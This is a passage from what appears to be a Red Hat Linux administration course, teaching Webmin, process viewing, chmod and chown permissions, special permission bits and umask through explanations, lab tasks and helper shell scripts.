After the previous command has been entered, all files and directories in the /marketing/June directory will have the marketing group as the group owner. To change the group ownership of a file or a directory if you are not the root account, you can use the chgrp command; however, in order to use this command, you must belong to both the current group that has ownership and the group to which you want to assign the ownership.

Webmin

Although you will most likely become quite comfortable, if you are not already, with managing your Linux machine from the Terminal Window and in the GUI, there is another administrative tool available for you to use. The tool is called Webmin. Webmin is a Web-based graphical interface for managing and making system administrative changes. Any Web browser that supports tables and forms will work for this tool. By using Webmin, you can change user accounts, configure file sharing, manage DNS, and more. Figure 3-11 shows a simple layout of Webmin, once the user has logged in.

Figure 3-11: Basic layout of Webmin.

Webmin is a freely available tool that can be found at www.webmin.com. In this course, the version used is 1.020. Updates are available at the Webmin Web site, so you can update as you wish.

TASK 3A-4
Installing Webmin

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Use the Nautilus File Manager to open your home directory. (From the Main Menu, choose Home Folder, or double-click the root's Home icon on the workspace.) Navigate to the / (root) directory.
2. Right-click the open space, and choose New Folder. Name the new folder Webmin.
3. Copy the Webmin Tarball or RPM to the new /Webmin directory. Your instructor will provide the location of the Webmin installation file.
4. Switch to the Terminal Window, and change to the new directory using the cd /Webmin command.
5. Follow your instructor's directions to install Webmin.
6. When you have accepted all of the default answers, the system should report a successful installation.
7. A default installation of the Webmin RPM sets the login name and password to root's login credentials, while a default installation of the Tarball sets the login name as admin and the password as blank, or null.
8. Test Webmin by opening a Web browser. The Web browser is the globe icon next to the Red Hat Main Menu icon.
9. In the Browser address bar, enter http://localhost:10000, and press Enter.
10. In the login screen that is displayed, enter the login credentials for Webmin. This should be admin and no password, if you performed the default Tarball installation, or root's credentials, if you performed the default RPM install.
11. In the Confirm box, click No. In the Security Warning box, click Continue.
12. At this stage, make no configuration changes, but feel free to perform some basic navigation.
13. When you are done exploring Webmin, close the Webmin window, and close the Nautilus File Manager.

Allow students 5 to 10 minutes to explore Webmin.

System Information

The last fundamental component of managing a Linux system that is discussed in this topic is the issue of finding and viewing system information. When securing your Linux system, you will want to know what processes are running, and how to identify those processes.

Process IDs

Every executable file on the computer can be thought of as a program. When a program is executed, this is referred to as a process. On a Linux system, associated with each process is a unique numeric identifier known as the Process Identifier (PID). Users can create processes, control the execution of a process, and even receive notification if the process's execution status changes.

Viewing the System Information

There are several commands that you can run to display and analyze the performance of a system. Two of these commands are ps and top. By using these commands, you can identify running processes, the amount of CPU time a process is taking, the user account associated with the process, the amount of memory a process is taking, and more. Figure 3-12 shows what the ps command output looks like.

Figure 3-12: The basic information provided by the ps command.

Although the above information is useful and provides solid data, there might be times when you are looking for a higher level of detail. In that case, you can use the ps command with aux. The ps aux command lists all the processes on the system, including the user account associated with each process. Figure 3-13 shows what the ps aux command output looks like. In the ps aux command, aux provides:

• a: All processes
• u: Additional user information
• x: Extended process listing

The ps command identifies the processes running by the current user, while ps aux identifies all running processes.

Figure 3-13: Running the ps aux command shows more detailed information than the ps command alone.

Using the ps command shows the processes and other data in a snapshot when the command is run. In many instances, this will provide the exact information that you were looking for. If, however, you are trying to see the processes running interactively, you will need to use the top command. By default, the top program updates the screen every second. If you wanted to increase the interval to every 7 seconds, for example, you would use the command top -d 7. There are additional functions available while running the top program; to see the list of what is available, press the H key while top is running.

By now, you should be comfortable with the fact that in Red Hat Linux, there are often several ways to complete a task, namely the command-line tools and the GUI tools. There is also a tool available in the GUI that can display system information interactively. This tool is called System Monitor. System Monitor allows you to select columns to sort data, in either ascending or descending order.

Figure 3-14: Running the System Monitor in Red Hat Linux.

One other piece of system information that you might want to identify is the disk space used. To view a report on the system's use of allocated disk space, you can use the df command. Entering df in a Terminal Window shows disk-space information. The default view shows the disk information in 1-K blocks. To view the information in GB and MB units, use the -h option, as shown in Figure 3-15.

Figure 3-15: Viewing disk-space allocation on a Linux system by using the df -h command.


TASK 3A-5
Viewing System Information

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Enter ps to view the current processes.
2. Enter ps aux to view the full list of all processes.
3. Enter top to view the processes interactively.
4. While top is still running, press H to look at the available functions in top.
5. Close all Terminal Windows.
6. From the Red Hat Main Menu, choose System Tools→System Monitor.
7. Scroll through the System Monitor options, comparing them to the terminal commands you just used.
8. When you have completed your review, close System Monitor.
9. Open a Terminal Window.
10. Enter df -h to view information about the disk space.
11. Close the Terminal Window.

Topic 3B
Fundamental Linux Security

In Linux, basic security measures consist of file system security, password security, and authentication methods. Let's begin by looking at file system security.

File and Directory Permissions

In Linux, when you log in to the system, you are identified by your user account. In addition to your user account, you might belong to a group or groups. A file can have permissions set for a user account, a group, and a category called others. If you are accessing an object and you are not the owner of the file (usually the creator of the file) or in the group that has access, then you are considered to be one of the others. Earlier, you were introduced to the information provided when viewing a file's details. This included the permissions for that file. Remember that every file has an owner and a group. Previously, you looked at a file whose details were:

-rwxrw-r-- 1 User1 Testers 512 Oct 24 19:42 firstdoc.txt

In this line, the firstdoc.txt file has permissions of: -rwxrw-r--

Now, for users of Windows operating systems, this will take a bit of getting used to, but the permission structure is logical. Look at the following other file examples:

-rwxrwxrwx 1 User1 Testers 512 Oct 9 sample.txt
-rw-r--r-- 1 User2 Newbies 1024 Oct 10 test.tar
drwxr-xr-- 1 User3 Finance 2048 Oct 11 15:26 DB_3

In these examples, notice that the first part of each line has a different listing of the permissions, and that the third example object is a directory (you can tell from the letter d as the first character). You can consider the permissions to be defined in columns. The permissions are broken into the object (such as file or directory), user permissions, group permissions, and others permissions. Looking at the previous firstdoc.txt example, this breaks down into the following (divided here by the pipe symbol so that you can easily see the divisions):

- | rwx | rw- | r-- |

The first column is a single character (in this case a dash, which represents a standard file), and is the only column that is not three characters in length. The second column represents the permissions for the user (owner), the third column represents the permissions for the group, and the fourth column represents the permissions for the others. The user's permission (User1 in this example) is listed as rwx, the group's permission (Testers in this example) is listed as rw-, and the others' permission is listed as r--.

Files and directories have four permission types. They are Read (R), Write (W), Execute (X), and No Permission (-). These permissions vary slightly from files to directories. The Read permission for files grants the ability to open and read a file's contents; for directories, the Read permission grants the ability to list the files in the directory. The Write permission for files grants the ability to modify (add, delete, or change) a file's content; for directories, the Write permission grants the ability to add or remove files or links in the directory. The Execute permission for files grants the ability to execute the file (or to run the exec command); for directories, the Execute permission grants the ability to change directories to subdirectories. The No Permission permission is applied only to files, and denies access to the file.

Before moving further into the permissions, we must spend a moment on number conversions. The permissions in Linux use octal numbers, which is a base-8 counting system. The octal system can represent 8 unique numbers, which might be listed in binary. The following table is a quick refresher on binary-to-octal conversions.

Binary Number    Octal Equivalent
000              0
001              1
010              2
011              3
100              4
101              5
110              6
111              7
1000             10

For each permission (user, group, and others), there are three possible characters: r, w, and x. These permission characters are always in this order. If a permission is granted, then a 1 is assigned to that character space. If a permission is not granted, then a 0 is assigned to that character space. Let's use the permissions of firstdoc.txt as an example. The permissions were -rwxrw-r--

The first character is a dash (-), therefore this is a file. The user permission is rwx, the group permission is rw-, and the others permission is r--. This can also be viewed as user permissions of 111, group permissions of 110, and others permissions of 100. The following table shows the conversions, from octal to binary to permissions.

Octal Number    Binary Equivalent    Permissions
0               000                  ---
1               001                  --x
2               010                  -w-
3               011                  -wx
4               100                  r--
5               101                  r-x
6               110                  rw-
7               111                  rwx

Using this table, you can see that if you want to assign the permission of Read (r), and no other permission, then octal 4 is the permission to assign. Likewise, if you want to assign the permission of Read, Write, and Execute (rwx), then octal 7 is the permission to assign. As a final example, if you want to assign the permission of Read and Write (rw), then octal 6 is the permission to assign.

Although you might end up memorizing the permission list shown, there is another method of arriving at the octal values. From your experience with binary numbers, you know that the three values listed are decimal 4, 2, and 1. Because the permissions are always defined as r, w, and x (in that order), you can also assign decimal values to these permissions. The Read permission is always on the left, the third character in binary, and can be assigned a decimal value of 4. The Write permission is always in the middle, the second character in binary, and can be assigned a decimal value of 2. The Execute permission is always on the right, the first character in binary, and can be assigned a decimal value of 1.

Therefore, the following is always true: Read = 4, Write = 2, and Execute = 1. Using this method, if you want to assign Read and Write permissions, simply add 4 + 2, to get 6. Compare that to the previous list, verifying that the octal, binary, and permissions do indeed match. You will see how this system works, and how it can be very efficient. Using the octal system for setting permissions creates values such as 0400, or 0440, and more. These four numbers represent the four columns of permissions described earlier. At this time, the first number will always be 0, as that is the character that defines the type of object (such as a file, a directory, or a link). Due to this, it is not uncommon for the leading 0 to not be listed. This would make the previous two permission examples simply 400 and 440.

An overall permission of 400 means that the user is given a permission of 4, the group a permission of 0, and the others a permission of 0. An overall permission of 440 means the user is given a permission of 4, the group a permission of 4, and the others a permission of 0. As a final example, an overall permission of 774 means the user is given a permission of 7, the group a permission of 7, and the others a permission of 4.
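As an added example (not code from the course), the following POSIX shell functions carry out the conversions the tables above describe in both directions: from the 10-character mode string that ls -l prints to the octal number that chmod accepts, and back. It goes beyond the three-digit form shown above by also decoding a leading fourth digit as the setuid, setgid and sticky bits, which the chmod s and t flags set and which appear as s or t in the ls -l string; the function names and the sample strings are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the course text: convert between the symbolic
# mode string shown by ls -l and the octal mode used by chmod.
# Needs only POSIX sh (no external commands).

# perm_to_octal MODESTRING
#   perm_to_octal "-rwxrw-r--"  -> 764
#   perm_to_octal "-rwsr-xr-x"  -> 4755   (s = execute plus setuid)
# The first character (object type: -, d, l, b, c) is skipped. Each
# rwx triplet becomes one digit with Read = 4, Write = 2, Execute = 1.
# An s or t in the execute position also sets the "special" digit:
# 4 (setuid) in the user column, 2 (setgid) in the group column,
# 1 (sticky) in the others column. Upper-case S or T means the special
# bit is set but execute is not. Returns 1 on a malformed string.
perm_to_octal() {
    str=$1
    [ ${#str} -eq 10 ] || return 1
    rest=${str#?}            # drop the type character
    digits=""; special=0
    col=4                    # special-bit weight of the current column
    while [ -n "$rest" ]; do
        t=${rest%"${rest#???}"}    # first three characters
        rest=${rest#???}
        val=0
        case $t in r??) val=$((val + 4)) ;; -??) ;; *) return 1 ;; esac
        case $t in ?w?) val=$((val + 2)) ;; ?-?) ;; *) return 1 ;; esac
        case $t in
            ??x)    val=$((val + 1)) ;;
            ??[st]) val=$((val + 1)); special=$((special + col)) ;;
            ??[ST]) special=$((special + col)) ;;
            ??-)    ;;
            *)      return 1 ;;
        esac
        digits="$digits$val"
        col=$((col / 2))
    done
    # Like stat -c %a: print the leading digit only when a special bit is set.
    if [ "$special" -ne 0 ]; then echo "$special$digits"; else echo "$digits"; fi
}

# octal_to_perm MODE
#   octal_to_perm 740   -> rwxr-----
#   octal_to_perm 2750  -> rwxr-s---
# Accepts 3 digits, or 4 digits where the first is the special digit.
# Returns 1 if the argument is not octal.
octal_to_perm() {
    mode=$1
    case $mode in
        [0-7][0-7][0-7])      special=0 ;;
        [0-7][0-7][0-7][0-7]) special=${mode%???}; mode=${mode#?} ;;
        *)                    return 1 ;;
    esac
    out=""; col=4
    while [ -n "$mode" ]; do
        d=${mode%"${mode#?}"}; mode=${mode#?}
        [ $((d & 4)) -ne 0 ] && out="${out}r" || out="${out}-"
        [ $((d & 2)) -ne 0 ] && out="${out}w" || out="${out}-"
        if [ $((special & col)) -ne 0 ]; then
            # special bit present: s/S for user and group, t/T for others
            if [ "$col" -eq 1 ]; then hi=t; lo=T; else hi=s; lo=S; fi
        else
            hi=x; lo=-
        fi
        [ $((d & 1)) -ne 0 ] && out="$out$hi" || out="$out$lo"
        col=$((col / 2))
    done
    echo "$out"
}

# Stand-alone use: convert every argument, choosing the direction from its form.
for arg in "$@"; do
    case $arg in
        [0-7][0-7][0-7]|[0-7][0-7][0-7][0-7])
            printf '%s -> %s\n' "$arg" "$(octal_to_perm "$arg")" ;;
        *)  printf '%s -> %s\n' "$arg" "$(perm_to_octal "$arg" || echo invalid)" ;;
    esac
done
```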

Setting Permissions

There are two methods of working with the permissions of an object. One method uses octal numbers, and the other uses permission strings. When setting permissions by using a string, you must answer three primary questions. They are:

1. Whom will this permission affect? (u) User, (g) Group, (o) Others, (a) All
2. What permission will be set? (r) Read, (w) Write, (x) Execute, (s) SetUID or SetGID, (t) Sticky Bit
3. What type of action is to be taken? (+) Addition, (-) Removal

Look at the following examples to see how the answers to these three questions work together to create the permission string:

• If you want to allow the group to have Read access, the string is g+r
• If you want to allow the owner (user) to have Read and Write access, the string is u+rw
• If you want to allow all (every user) to have Read and Execute access, the string is a+rx

The chmod Command

The command to use to change permissions is chmod (Change Mode). With chmod, you can use either the octal method or the string method. The following two examples show chmod being used with each method. These permissions are giving the user Read, Write, and Execute permissions, the group Read, Write, and Execute permissions, and the others Read permission.

chmod 774 vacation_pictures.tar.gz
chmod u+rwx,g+rwx,o+r vacation_pictures.tar.gz

The following example shows these methods used to change the permissions on a directory. In this example, the directory is called /database/Feb. The first two lines are examples of setting the permissions for everyone to have full access to this database. The second two lines add the -R option, which applies the changed permission to all files and subdirectories in the directory. The second two lines are giving Read, Write, and Execute permissions on the directory to the user and group, and Read to others.

chmod 777 /database/Feb
chmod a+rwx /database/Feb
chmod -R 774 /database/Feb
chmod -R u+rwx,g+rwx,o+r /database/Feb

In the following task, you will create four user accounts, who are part of two groups. You will then create four files and two directories. Finally, you will configure the ownership of these objects, and verify the new ownership.

TASK 3B-1
Creating Object Ownerships

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Use either the Terminal Window or the Red Hat User Manager to create the following list of users and groups, and assign the users to the groups. For each user, the password is qwerty.
   a. User1, GroupA
   b. User2, GroupA
   c. User3, GroupB
   d. User4, GroupB

   You can either delete the existing User1 and create a new one, or modify the properties of the existing one.

2. Use either the Terminal Window or the Nautilus File Manager to create the following files and directories:
   a. /Marketing/Campaign.txt
   b. /Marketing/Tracking.txt
   c. /Research/Software.txt
   d. /Research/Development.txt

3. In the Terminal Window, check the current ownership and permissions for the Marketing directory by using the ls -l /Marketing command.
4. Check the current ownership and permissions for the Research directory.
5. Change directories to the Marketing directory.
6. Enter chown User1.GroupA Campaign.txt to change the ownership of Campaign.txt.
7. Change the ownership of Tracking.txt to User2.GroupA.
8. Change directories to the Research directory.
9. Change the ownership of Software.txt to User3.GroupB.
10. Change the ownership of Development.txt to User4.GroupB.
11. Check the current ownership and permissions for the Marketing directory.
12. Check the current ownership and permissions for the Research directory.
13. Change directories back to /root.
14. From root, change the ownership of the Marketing directory by using the chown -R .GroupA /Marketing command.
15. Change the ownership of the Research directory to GroupB.

Assigning Permissions
Once you have created the objects described in the previous task, you have the pieces in place to create the permission structure. You are going to create permissions that allow members of GroupA to have access to the Marketing folder, with User1 accessing the Campaign.txt document. User2 will be given access to the Tracking.txt document. User3 will be given access to the Software.txt document, and User4 will be given access to the Development.txt document.

TASK 3B-2
Assigning Permissions

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. Change to the Marketing directory.
2. Enter chmod 740 Campaign.txt to assign the permissions to Campaign.txt.
3. Enter chmod 740 Tracking.txt to assign the permissions to Tracking.txt.
4. Change to the /root directory.
5. Enter chmod -R 770 /Marketing to assign the permissions to the Marketing directory.
6. Change to the Research directory.
7. Enter chmod u+rwx,g+rwx Software.txt to assign the permissions to Software.txt.
8. Enter chmod u+rwx,g+rwx Development.txt to assign the permissions to Development.txt.
9. Change to the /root directory.
10. Enter chmod -R 770 /Research to assign the permissions to the Research directory.

Testing Assigned Permissions

At this stage, you have created four users, two groups, four files, and two directories. You then assigned the users to their groups, and assigned permissions on the files and directories. Next, you will test the permissions by logging in as the four users (using the substitute user command) and attempting to access all four files. It is recommended that you take advantage of the Workspace Switcher in this task, because it lets you have one workspace open for each user.

TASK 3B-3
Verifying Permissions

Setup: You are logged on to Red Hat 8 as root, and a Terminal Window is open.

1. In the Terminal Window, enter su - User1 to switch to the User1 account.
2. Attempt to access all four files from the previous task.
3. Identify which ones you can access, the level of access (by trying to create a file, for example), and the ones you cannot access.

   File Name                    Access Granted?   Level of Access Granted
   /Marketing/Campaign.txt      Yes               rwx
   /Marketing/Tracking.txt      Yes               rwx
   /Research/Software.txt       No                None
   /Research/Development.txt    No                None

   Verify that the access is correct based on the permissions you assigned in the previous task.
4. Activate the Workplace Switcher, and click any open space to switch to another workspace.
5. Open a Terminal Window.
6. Enter su - User2 to switch to the User2 account.
7. Attempt to access all four files from the previous task.
8. Identify which ones you can access, the level of access (by trying to create a file, for example), and the ones you cannot access.

   File Name                    Access Granted?   Level of Access Granted
   /Marketing/Campaign.txt      Yes               rwx
   /Marketing/Tracking.txt      Yes               rwx
   /Research/Software.txt       No                None
   /Research/Development.txt    No                None

   Verify that the access is correct based on the permissions you assigned in the previous task.
9. Activate the Workplace Switcher, and click any open space to switch to another workspace.
10. Open a Terminal Window.
11. Enter su - User3 to switch to the User3 account.
12. Attempt to access all four files from the previous task.
13. Identify which ones you can access, the level of access (by trying to create a file, for example), and the ones you cannot access.

   File Name                    Access Granted?   Level of Access Granted
   /Marketing/Campaign.txt      No                None
   /Marketing/Tracking.txt      No                None
   /Research/Software.txt       Yes               rwx
   /Research/Development.txt    Yes               rwx

   Verify that the access is correct based on the permissions you assigned in the previous task.
14. Switch to another workspace, open a Terminal Window, and switch to the User4 account.
15. Attempt to access all four files from the previous task.
16. Identify which ones you can access, the level of access (by trying to create a file, for example), and the ones you cannot access.

   File Name                    Access Granted?   Level of Access Granted
   /Marketing/Campaign.txt      No                None
   /Marketing/Tracking.txt      No                None
   /Research/Software.txt       Yes               rwx
   /Research/Development.txt    Yes               rwx

   Verify that the access is correct based on the permissions you assigned in the previous task.
17. Close all windows and workspaces, and return to the root account.
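As an added example (not part of the course material), the script below rebuilds the Marketing and Research tree from Tasks 3B-1 and 3B-2 under a temporary directory, applies exactly the chmod commands of Task 3B-2, and then predicts the "Level of Access Granted" column of the tables above. Because chown to User1 through User4 needs root and those accounts, ownership is not set on disk; instead each lookup states the user's relationship to the file (owner, group or other), which is what the permission bits are matched against. The function names build_tree, access_for and row_for are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the course): apply the Task 3B-2 chmod sequence
# to a constructed copy of the tree and derive each user's level of access
# from the mode bits and the user's relationship to the file.

# digit_to_rwx DIGIT: print rwx (or None) in the style of the task tables.
digit_to_rwx() {
    s=""
    [ $(( $1 & 4 )) -ne 0 ] && s="${s}r"
    [ $(( $1 & 2 )) -ne 0 ] && s="${s}w"
    [ $(( $1 & 1 )) -ne 0 ] && s="${s}x"
    [ -z "$s" ] && s=None
    echo "$s"
}

# mode_digit FILE ROLE: the permission digit for owner|group|other,
# read from ls -l so it works with both GNU and BSD tools.
mode_digit() {
    perms=$(ls -ld "$1" | cut -c2-10)
    case $2 in
        owner) bits=$(printf %s "$perms" | cut -c1-3);;
        group) bits=$(printf %s "$perms" | cut -c4-6);;
        other) bits=$(printf %s "$perms" | cut -c7-9);;
        *) echo "role must be owner, group or other" >&2; return 1;;
    esac
    d=0
    case "$bits" in *r*) d=$((d + 4));; esac
    case "$bits" in *w*) d=$((d + 2));; esac
    case "$bits" in *x*) d=$((d + 1));; esac
    echo "$d"
}

# build_tree ROOT: the four files and the exact chmod steps of Task 3B-2.
build_tree() {
    mkdir -p "$1/Marketing" "$1/Research"
    for f in Marketing/Campaign.txt Marketing/Tracking.txt \
             Research/Software.txt Research/Development.txt; do
        : > "$1/$f"
    done
    chmod 740 "$1/Marketing/Campaign.txt" "$1/Marketing/Tracking.txt"
    chmod -R 770 "$1/Marketing"
    chmod u+rwx,g+rwx "$1/Research/Software.txt" "$1/Research/Development.txt"
    chmod -R 770 "$1/Research"
}

# access_for ROOT FILE ROLE: the level of access for one user. ROLE is
# the user's relationship to FILE, e.g. User2 is "group" for
# /Marketing/Campaign.txt (GroupA) but "other" for /Research/Software.txt.
access_for() {
    digit_to_rwx "$(mode_digit "$1/$2" "$3")"
}

# row_for R1 R2 R3 R4: one table row, given the user's role for
# Campaign.txt, Tracking.txt, Software.txt and Development.txt in turn.
row_for() {
    root=$(mktemp -d)
    build_tree "$root"
    printf '%s %s %s %s\n' \
        "$(access_for "$root" Marketing/Campaign.txt "$1")" \
        "$(access_for "$root" Marketing/Tracking.txt "$2")" \
        "$(access_for "$root" Research/Software.txt "$3")" \
        "$(access_for "$root" Research/Development.txt "$4")"
    rm -rf "$root"
}
```

User2's row is row_for group owner other other (GroupA member, owner of Tracking.txt, outsider to the Research files) and User3's row is row_for other other owner group; both reproduce the tables above, which shows that the files' own 740 modes were overridden by the later chmod -R 770 on the directories.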

The SetUID, SetGID, and the Sticky Bit Permissions


Earlier, when you were first looking at permissions, three other things were listed in addition to Read, Write, Execute, and No Permission: SetUID, SetGID, and the Sticky Bit. The SetUID (or Set User Identification) permission bit can be set on an executable file. When set on a file, the file will execute not with the permissions of the user who is running the program, but with the permissions of the owner of the program. The use of this is not suggested, as it can cause security problems: a program executed by one user runs with the permissions of a different user. SetGID (or Set Group Identification) is similar to SetUID, only the permissions on the executable are based on group permissions.

Applications that are designed to use the SetUID or the SetGID permission must be properly secured. These applications are often programmed to run as root, and any attempt at altering these les could lead to a system breach.
breach: The successful defeat of security controls which could result in a penetration of the system. A violation of controls of a particular information system such that information assets or system components are unduly exposed.

Using chmod as is done in the first of the examples listed below sets the permissions on files to rwxrwxrwx; there is nothing new about that, but now we can look at the bits in front of those nine:

---rwxrwxrwx

The 10th bit (reading from the right, as we do in binary) designates the sticky bit. The 11th bit (reading from the right) designates the SetGID bit. The 12th bit (reading from the right) designates the SetUID bit.

In the following examples you will see the process of setting the SetGID, SetUID, and Sticky Bit permissions. In the command chmod -v 1777 file, the chmod command itself should be familiar to you by now; the -v just tells the machine to be verbose, that is, to give an output related to the command, rather than just executing the command silently.

So the command chmod 1777 file would give all three groups (owner, group, other) read, write, and execute permissions, but set the sticky bit so that only the root account could delete the file.

Here are some other possible commands and their meanings. All commands give rwx to all three objects; only the 10th, 11th, and 12th bits are of interest to us for this demonstration.

Command              Result                                       Comment
chmod -v 777 file    Mode of file changed to 0777 (rwxrwxrwx).
chmod -v 1777 file   Mode of file changed to 1777 (rwxrwxrwt).    Sticky Bit is set.
chmod -v 2777 file   Mode of file changed to 2777 (rwxrwsrwx).    GID is set.
chmod -v 3777 file   Mode of file changed to 3777 (rwxrwsrwt).    GID and Sticky Bit are set.
chmod -v 4777 file   Mode of file changed to 4777 (rwsrwxrwx).    UID is set.
chmod -v 5777 file   Mode of file changed to 5777 (rwsrwxrwt).    UID and Sticky Bit are set.
chmod -v 6777 file   Mode of file changed to 6777 (rwsrwsrwx).    GID and UID are set.
chmod -v 7777 file   Mode of file changed to 7777 (rwsrwsrwt).    GID, UID, and Sticky Bit are set.

It is rumored that the Sticky Bit feature was originally created to let an application remain (or stick) in the computer's memory even after it had finished running. This would allow for quicker recall and execution if and when that object were to be called again. As systems have increased in power and the abilities of memory (both in speed and capacity) have increased, the need for the Sticky Bit has diminished. However, a new use for the Sticky Bit has evolved. When the Sticky Bit is set for a directory, such as /tmp, it protects the files within that directory from deletion by non-owners. Consider the file /tmp/yrlyrept. If the Sticky Bit has been set for /tmp, only the owner of the /tmp/yrlyrept file or the owner of the /tmp directory can delete the file.
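The table above only covers modes where all nine rwx bits are set. The following added example (not from the course) decodes any three- or four-digit octal mode into the string chmod -v and ls print, including the case the table does not show: when a special bit is set but the matching execute bit is not, ls shows an upper-case S or T instead of s or t. The helper names triad, mode_to_string and ls_string are constructed for this example; ls_string applies a mode to a scratch file and reads back what ls shows, so the decoder can be checked against the real tools.

```shell
#!/bin/sh
# Added example (not from the course): decode an octal mode such as 1777
# or 4755 into the rwsrwsrwt form, then compare with what ls -l reports.

# triad DIGIT SPECIAL LETTER: one rwx group. SPECIAL is 1 when the
# setuid/setgid/sticky bit that maps onto this group is set; LETTER is
# "s" (owner and group) or "t" (other).
triad() {
    out=""
    if [ $(( $1 & 4 )) -ne 0 ]; then out="${out}r"; else out="${out}-"; fi
    if [ $(( $1 & 2 )) -ne 0 ]; then out="${out}w"; else out="${out}-"; fi
    exec_bit=$(( $1 & 1 ))
    if [ "$2" -eq 1 ]; then
        # Lower-case when the execute bit is also set, upper-case when not.
        if [ "$exec_bit" -ne 0 ]; then out="${out}$3"
        else out="${out}$(printf %s "$3" | tr st ST)"; fi
    elif [ "$exec_bit" -ne 0 ]; then out="${out}x"
    else out="${out}-"
    fi
    echo "$out"
}

# mode_to_string MODE: MODE is three or four octal digits; the leading
# digit holds setuid (4), setgid (2) and sticky (1), the 12th to 10th bits.
mode_to_string() {
    m=$1
    [ ${#m} -eq 3 ] && m="0$m"
    special=$(printf %s "$m" | cut -c1)
    u=$(printf %s "$m" | cut -c2)
    g=$(printf %s "$m" | cut -c3)
    o=$(printf %s "$m" | cut -c4)
    setuid=$(( (special & 4) != 0 ))
    setgid=$(( (special & 2) != 0 ))
    sticky=$(( (special & 1) != 0 ))
    printf '%s%s%s\n' "$(triad "$u" "$setuid" s)" \
                      "$(triad "$g" "$setgid" s)" \
                      "$(triad "$o" "$sticky" t)"
}

# ls_string MODE: apply MODE to a scratch file and return the nine
# permission characters ls -l shows for it.
ls_string() {
    f=$(mktemp)
    chmod "$1" "$f"
    ls -l "$f" | cut -c2-10
    rm -f "$f"
}
```

A mode such as 2644 decodes to rw-r-Sr--: the group has setgid but no execute bit, which is the upper-case case, and is the kind of oddity worth noticing when reviewing a file listing for SetUID or SetGID programs.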

The umask Command

Whenever a user creates a file or directory, Linux must have a system of assigning the initial permissions to that object. The system that Linux uses is called a mask. The mask is set using a command called umask. The mask is the complement of the octal value that is assigned as permissions to an object. Here are several examples:

If the permissions of a file are 664, the mask value is 002.
If the permissions of a file are 666, the mask value is 000.
If the permissions of a file are 663, the mask value is 003.

Looking at this in reverse, if you have a mask of 662, the effective permissions are 004. If you have a mask of 066, the permissions are 600.

The default umask value can be set for all users in the /etc/bashrc file. By default, the lines that determine the umask setting look like this:

if [ "`id -gn`" = "`id -un`" -a `id -u` -gt 99 ]; then
    umask 002
else
    umask 022
fi

The lines mean that any user with a UID greater than 99 will get a umask value of 002. Any user with a UID less than 99, including root and system accounts, will get a umask value of 022. Remember that when new users are created, their UIDs start at 500, ensuring that all normal users of the system will get a umask value of 002 as their default. The effective setting of this is the complement octal value, which is 664. A setting of 664 means the user will have rw-, the group will have rw-, and the others will have r--.

This may or may not be suitable for your environment, but it is recommended, from a security perspective, that this be changed, because it is not advisable to have all files readable by everyone (the others). For this reason, it is suggested that the permissions be changed so that all UIDs greater than 99 use a mask of 006, and that all UIDs less than 99 use a mask of 066. To restrict other group members from being able to write to all files while allowing all read access, you could use the mask 022.

In previous versions of Red Hat Linux, the default umask value was set in the /etc/profile file, and the UID threshold was 14.
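The examples above work the mask arithmetic by hand. The added script below (not from the course) does the same computation for any mask and confirms it by creating a file and a directory under that mask in a subshell. It makes explicit something the text leaves implicit: a new file starts from 666 and a new directory from 777, and the mask clears bits from that base, which is why a mask of 002 yields 664 for files but 775 for directories. The functions umask_result, create_with_umask and others_readable are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the course): compute the permissions a new
# object receives under a umask and confirm with a real umask.

# umask_result MASK KIND: KIND is "file" (base 666) or "dir" (base 777);
# prints the resulting three octal digits, one digit at a time so that no
# octal-to-decimal conversion is needed.
umask_result() {
    case $2 in
        file) base=666;;
        dir)  base=777;;
        *) echo "kind must be file or dir" >&2; return 1;;
    esac
    out=""
    i=1
    while [ $i -le 3 ]; do
        b=$(printf %s "$base" | cut -c$i)
        m=$(printf %s "$1" | cut -c$i)
        out="$out$(( b & ~m & 7 ))"      # clear the masked bits
        i=$((i + 1))
    done
    echo "$out"
}

# observed_mode FILE: three octal digits as shown by ls -l (portable).
observed_mode() {
    perms=$(ls -ld "$1" | cut -c2-10)
    out=""
    for triplet in 1-3 4-6 7-9; do
        bits=$(printf %s "$perms" | cut -c$triplet)
        d=0
        case "$bits" in *r*) d=$((d + 4));; esac
        case "$bits" in *w*) d=$((d + 2));; esac
        case "$bits" in *x*) d=$((d + 1));; esac
        out="$out$d"
    done
    echo "$out"
}

# create_with_umask MASK: create a file and a directory under MASK and
# print "FILEMODE DIRMODE"; the subshell keeps the mask from leaking.
create_with_umask() {
    dir=$(mktemp -d)
    (umask "$1"; : > "$dir/f"; mkdir "$dir/d")
    echo "$(observed_mode "$dir/f") $(observed_mode "$dir/d")"
    rm -rf "$dir"
}

# others_readable MASK: 1 if a file created under MASK is readable by
# "others", the condition the text recommends masks of 006/066 to avoid.
others_readable() {
    o=$(umask_result "$1" file | cut -c3)
    echo $(( (o & 4) != 0 ))
}
```

Running others_readable on the default 002 gives 1 and on the recommended 006 gives 0, which is the whole point of the change suggested above; umask_result 662 file reproduces the text's "mask of 662 gives 004".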

TASK 3B-4
Configuring umask Settings

Setup: You are logged on to Red Hat 8 as root.

1. In your home directory, create a new file called Mask.test.
2. View the permissions for the new file. If necessary, close the Properties window.
3. Navigate to the /etc/bashrc file, and make a copy of it.
4. Use a text editor (for instance, gedit) to open the /etc/bashrc file.
5. View the umask settings.
6. Change the settings for UID greater than 99 to 006, and change the settings for UID less than 99 to 046 to follow the recommendations outlined in the previous Concepts section. Close the /etc/bashrc file.
7. Log out and then log back in as root.
8. In your home directory, create a new file called Mask2.test.
9. Compare the permissions of the two test documents to verify that the new umask settings are in effect.
10. Return the umask settings in the /etc/bashrc file to their defaults. You can either re-edit the changed file, or delete the changed file and rename the backup that you made earlier in this task.
11. Close all open windows.

Password Security

